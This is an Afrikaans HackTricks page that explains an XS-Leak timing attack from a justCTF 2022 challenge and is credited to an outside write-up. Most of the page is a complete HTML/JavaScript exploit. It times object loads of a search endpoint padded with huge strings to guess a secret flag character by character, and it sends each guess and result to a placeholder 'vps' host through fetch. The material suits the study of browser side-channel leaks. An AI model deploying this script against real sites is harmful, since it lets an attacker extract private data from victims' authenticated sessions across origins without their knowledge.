# performance.now + Force heavy task

{{#include ../../banners/hacktricks-training.md}}

**Eksploit geneem van [https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/](https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/)**

In hierdie uitdaging kon die gebruiker duisende karakters stuur en as die vlag ingesluit was, sou die karakters teruggestuur word na die bot. Deur 'n groot hoeveelheid karakters te stuur, kon die aanvaller meet of die vlag in die gestuurde string ingesluit was of nie.

> [!WARNING]
> Aanvanklik het ek nie die objek se breedte en hoogte gestel nie, maar later het ek gevind dat dit belangrik is omdat die standaardgrootte te klein is om 'n verskil in die laaityd te maak.
```html
<!DOCTYPE html>
<html>
<head> </head>
<body>
<img src="https://deelay.me/30000/https://example.com" />
<script>
fetch("https://deelay.me/30000/https://example.com")

function send(data) {
fetch("http://vps?data=" + encodeURIComponent(data)).catch((err) => 1)
}

function leak(char, callback) {
return new Promise((resolve) => {
let ss = "just_random_string"
let url =
`http://baby-xsleak-ams3.web.jctf.pro/search/?search=${char}&msg=` +
ss[Math.floor(Math.random() * ss.length)].repeat(1000000)
let start = performance.now()
let object = document.createElement("object")
object.width = "2000px"
object.height = "2000px"
object.data = url
object.onload = () => {
object.remove()
let end = performance.now()
resolve(end - start)
}
object.onerror = () => console.log("Error event triggered")
document.body.appendChild(object)
})
}

send("start")

let charset = "abcdefghijklmnopqrstuvwxyz_}".split("")
let flag = "justCTF{"

async function main() {
let found = 0
let notFound = 0
for (let i = 0; i < 3; i++) {
await leak("..")
}
for (let i = 0; i < 3; i++) {
found += await leak("justCTF")
}
for (let i = 0; i < 3; i++) {
notFound += await leak("NOT_FOUND123")
}

found /= 3
notFound /= 3

send("found flag:" + found)
send("not found flag:" + notFound)

let threshold = found - (found - notFound) / 2
send("threshold:" + threshold)

if (notFound > found) {
return
}

// exploit
while (true) {
if (flag[flag.length - 1] === "}") {
break
}
for (let char of charset) {
let trying = flag + char
let time = 0
for (let i = 0; i < 3; i++) {
time += await leak(trying)
}
time /= 3
send("char:" + trying + ",time:" + time)
if (time >= threshold) {
flag += char
send(flag)
break
}
}
}
}

main()
</script>
</body>
</html>
```
{{#include ../../banners/hacktricks-training.md}}